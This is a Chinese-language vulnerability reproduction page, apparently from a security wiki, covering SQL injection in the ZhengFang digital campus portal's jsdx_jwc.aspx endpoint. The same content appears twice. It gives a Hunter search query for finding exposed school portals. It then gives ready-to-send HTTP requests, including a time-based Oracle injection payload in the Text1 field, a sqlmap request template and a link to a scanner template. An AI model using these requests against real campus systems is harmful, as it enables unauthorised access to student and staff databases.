fofamini-wiki

登录白背景

源码

正方数字化校园平台jsdx_jwc存在SQL注入漏洞

一、漏洞简介

正方数字化校园信息门户平台通过对校园现有的各种系统和资源的有效集成整合，以门户的形式为学校教师、学生提供其所需的各种信息与服务，来提高校园核心竞争力，是数字化校园的重要组成部分。正方数字化校园平台jsdx_jwc存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

hunter(web.title="正方数字化校园信息门户"||web.title="数字化校园信息门户"||web.title="统一身份认证中心")&&web.body="正方"、web.body="zfca/login"&&web.body="login_bg"
特征

四、漏洞复现

获取__VIEWSTATE

GET /jsdx_jwc.aspx?url=js_jxrw.aspx&usertype=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

使用获取的__VIEWSTATE替换测试注入

POST /jsdx_jwc.aspx?url=js_jxrw.aspx&usertype=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=y40w2d454fi1155532uqfx45
Content-Length: 132

__VIEWSTATE=dDw1ODA1MTY0Nzs7PuxuvqiSIrs3wcYFy1qakqRKiR1M&__VIEWSTATEGENERATOR=&Text1=123%27+AND+1655%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28107%29%7C%7CCHR%28103%29%7C%7CCHR%2877%29%7C%7CCHR%2890%29%2C5%29+AND+%27nBHe%27%3D%27nBHe&Text2=admin&Button1=%E7%99%BB %E5%BD%95

sqlmap

POST /jsdx_jwc.aspx?url=js_jxrw.aspx&usertype=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=y40w2d454fi1155532uqfx45
Content-Length: 128

__VIEWSTATE=dDw1ODA1MTY0Nzs7PuxuvqiSIrs3wcYFy1qakqRKiR1M&__VIEWSTATEGENERATOR=&Text1=123&Text2=admin&Button1=%E7%99%BB+%E5%BD%95

zfca-jsdx_jwc-sqli.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/dyr7m1xhu7yvybt4

# 正方数字化校园平台jsdx_jwc存在SQL注入漏洞

# 一、漏洞简介
正方数字化校园信息门户平台通过对校园现有的各种系统和资源的有效集成整合，以门户的形式为学校教师、学生提供其所需的各种信息与服务，来提高校园核心竞争力，是数字化校园的重要组成部分。正方数字化校园平台jsdx_jwc存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

# 二、影响版本

- hunter`(web.title="正方数字化校园信息门户"||web.title="数字化校园信息门户"||web.title="统一身份认证中心")&&web.body="正方"`、`web.body="zfca/login"&&web.body="login_bg"`
- 特征

![image.png](./img/IhAlobGZ20XIIvw1/1702283487709-918c059e-9f97-4350-afe6-913323b0c83d-426756.png)

# 四、漏洞复现

1. 获取`__VIEWSTATE`
```
GET /jsdx_jwc.aspx?url=js_jxrw.aspx&usertype=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
```
![image.png](./img/IhAlobGZ20XIIvw1/1711986801621-a2e06336-d9c9-4a12-bf33-cee15d16d348-188044.png)

2. 使用获取的`__VIEWSTATE`替换测试注入
```
POST /jsdx_jwc.aspx?url=js_jxrw.aspx&usertype=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=y40w2d454fi1155532uqfx45
Content-Length: 132

__VIEWSTATE=dDw1ODA1MTY0Nzs7PuxuvqiSIrs3wcYFy1qakqRKiR1M&__VIEWSTATEGENERATOR=&Text1=123%27+AND+1655%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28107%29%7C%7CCHR%28103%29%7C%7CCHR%2877%29%7C%7CCHR%2890%29%2C5%29+AND+%27nBHe%27%3D%27nBHe&Text2=admin&Button1=%E7%99%BB %E5%BD%95
```
![image.png](./img/IhAlobGZ20XIIvw1/1711986853491-9b0efc2e-5fe1-4ba5-9103-1aa4595dc112-189599.png)
sqlmap
```
POST /jsdx_jwc.aspx?url=js_jxrw.aspx&usertype=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=y40w2d454fi1155532uqfx45
Content-Length: 128

__VIEWSTATE=dDw1ODA1MTY0Nzs7PuxuvqiSIrs3wcYFy1qakqRKiR1M&__VIEWSTATEGENERATOR=&Text1=123&Text2=admin&Button1=%E7%99%BB+%E5%BD%95
```
![image.png](./img/IhAlobGZ20XIIvw1/1711986877696-dc885e38-d305-47db-b22a-9b40cc0b1d2c-352106.png)
[zfca-jsdx_jwc-sqli.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1712019587440-df058950-511d-4fab-8613-0093cafc6378.yaml?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fyaml%2F1622799%2F1712019587440-df058950-511d-4fab-8613-0093cafc6378.yaml%22%2C%22name%22%3A%22zfca-jsdx_jwc-sqli.yaml%22%2C%22size%22%3A1885%2C%22ext%22%3A%22yaml%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22u81846583-865d-4c6f-b7cf-65faa113d2f%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fx-yaml%22%2C%22__spacing%22%3A%22both%22%2C%22mode%22%3A%22title%22%2C%22id%22%3A%22ue697f5ea%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dyr7m1xhu7yvybt4>